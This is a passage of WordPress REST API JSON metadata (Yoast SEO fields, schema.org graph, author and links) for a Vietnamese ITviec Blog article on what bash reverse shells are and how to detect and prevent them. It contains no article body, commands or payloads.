content=\"M\u1ef9 Duy\u00ean\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc\" \/>\n\t<meta name=\"twitter:data2\" content=\"21 ph\u00fat\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Bash reverse shell l\u00e0 g\u00ec: C\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng reverse shell hi\u1ec7u qu\u1ea3 - ITviec Blog","description":"T\u00ecm hi\u1ec3u c\u00e1ch tin t\u1eb7c d\u00f9ng reverse shell, c\u00e1c v\u00ed d\u1ee5 (nh\u01b0 bash reverse shell), c\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng \u0111\u1ec3 b\u1ea3o v\u1ec7 h\u1ec7 th\u1ed1ng t\u1ed1t nh\u1ea5t.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/","og_locale":"vi_VN","og_type":"article","og_title":"Bash reverse shell l\u00e0 g\u00ec: C\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng reverse shell hi\u1ec7u qu\u1ea3","og_description":"Reverse shell l\u00e0 m\u1ed9t trong nh\u1eefng c\u00f4ng c\u1ee5 ph\u1ed5 bi\u1ebfn m\u00e0 c\u00e1c tin t\u1eb7c s\u1eed d\u1ee5ng \u0111\u1ec3 x\u00e2m nh\u1eadp v\u00e0 chi\u1ebfm quy\u1ec1n \u0111i\u1ec1u khi\u1ec3n h\u1ec7 th\u1ed1ng m\u1ee5c ti\u00eau. 
V\u1edbi nh\u1eefng \u0111\u1eb7c \u0111i\u1ec3m tinh","og_url":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/","og_site_name":"ITviec Blog","article_publisher":"https:\/\/www.facebook.com\/ITviec","article_published_time":"2025-04-26T11:30:12+00:00","article_modified_time":"2025-04-26T11:32:35+00:00","og_image":[{"width":640,"height":337,"url":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2025\/04\/bash-reverse-shell-vippro-scaled.png","type":"image\/png"}],"author":"M\u1ef9 Duy\u00ean","twitter_card":"summary_large_image","twitter_creator":"@ITviec","twitter_site":"@ITviec","twitter_misc":{"\u0110\u01b0\u1ee3c vi\u1ebft b\u1edfi":"M\u1ef9 Duy\u00ean","\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc":"21 ph\u00fat"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#article","isPartOf":{"@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/"},"author":{"name":"M\u1ef9 Duy\u00ean","@id":"https:\/\/itviec.com\/blog\/#\/schema\/person\/73733c0725c7e39e696a896bd1abe2d7"},"headline":"Bash reverse shell l\u00e0 g\u00ec: C\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng reverse shell hi\u1ec7u qu\u1ea3","datePublished":"2025-04-26T11:30:12+00:00","dateModified":"2025-04-26T11:32:35+00:00","mainEntityOfPage":{"@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/"},"wordCount":5733,"publisher":{"@id":"https:\/\/itviec.com\/blog\/#organization"},"image":{"@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#primaryimage"},"thumbnailUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2025\/04\/bash-reverse-shell-vippro-scaled.png","articleSection":["Chuy\u00ean m\u00f4n IT"],"inLanguage":"vi"},{"@type":"WebPage","@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/","url":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/","name":"Bash reverse shell l\u00e0 g\u00ec: C\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng 
reverse shell hi\u1ec7u qu\u1ea3 - ITviec Blog","isPartOf":{"@id":"https:\/\/itviec.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#primaryimage"},"image":{"@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#primaryimage"},"thumbnailUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2025\/04\/bash-reverse-shell-vippro-scaled.png","datePublished":"2025-04-26T11:30:12+00:00","dateModified":"2025-04-26T11:32:35+00:00","description":"T\u00ecm hi\u1ec3u c\u00e1ch tin t\u1eb7c d\u00f9ng reverse shell, c\u00e1c v\u00ed d\u1ee5 (nh\u01b0 bash reverse shell), c\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng \u0111\u1ec3 b\u1ea3o v\u1ec7 h\u1ec7 th\u1ed1ng t\u1ed1t nh\u1ea5t.","breadcrumb":{"@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#breadcrumb"},"inLanguage":"vi","potentialAction":[{"@type":"ReadAction","target":["https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/"]}]},{"@type":"ImageObject","inLanguage":"vi","@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#primaryimage","url":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2025\/04\/bash-reverse-shell-vippro-scaled.png","contentUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2025\/04\/bash-reverse-shell-vippro-scaled.png","width":640,"height":337,"caption":"Bash reverse shell - itviec blog"},{"@type":"BreadcrumbList","@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Chuy\u00ean m\u00f4n IT","item":"https:\/\/itviec.com\/blog\/chuyen-mon-it\/"},{"@type":"ListItem","position":2,"name":"Bash reverse shell l\u00e0 g\u00ec: C\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng reverse shell hi\u1ec7u qu\u1ea3"}]},{"@type":"WebSite","@id":"https:\/\/itviec.com\/blog\/#website","url":"https:\/\/itviec.com\/blog\/","name":"ITviec Blog","description":"IT Jobs &amp; People in 
Vietnam","publisher":{"@id":"https:\/\/itviec.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/itviec.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"vi"},{"@type":"Organization","@id":"https:\/\/itviec.com\/blog\/#organization","name":"ITviec","url":"https:\/\/itviec.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"vi","@id":"https:\/\/itviec.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2018\/12\/itviec-black-square-facebook.png","contentUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2018\/12\/itviec-black-square-facebook.png","width":1800,"height":1800,"caption":"ITviec"},"image":{"@id":"https:\/\/itviec.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/ITviec","https:\/\/x.com\/ITviec","https:\/\/www.linkedin.com\/company\/itviec","https:\/\/www.youtube.com\/channel\/UCYthAQ3bcGr57M_ag5gHDvQ"]},{"@type":"Person","@id":"https:\/\/itviec.com\/blog\/#\/schema\/person\/73733c0725c7e39e696a896bd1abe2d7","name":"M\u1ef9 Duy\u00ean","image":{"@type":"ImageObject","inLanguage":"vi","@id":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/03\/Author_Duyen-Tran-120x120.jpg","url":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/03\/Author_Duyen-Tran-120x120.jpg","contentUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/03\/Author_Duyen-Tran-120x120.jpg","caption":"M\u1ef9 
Duy\u00ean"},"url":"https:\/\/itviec.com\/blog\/author\/my-duyen\/"}]}},"_links":{"self":[{"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/posts\/86370","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/users\/209"}],"replies":[{"embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/comments?post=86370"}],"version-history":[{"count":0,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/posts\/86370\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/media\/87362"}],"wp:attachment":[{"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/media?parent=86370"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/categories?post=86370"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/tags?post=86370"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}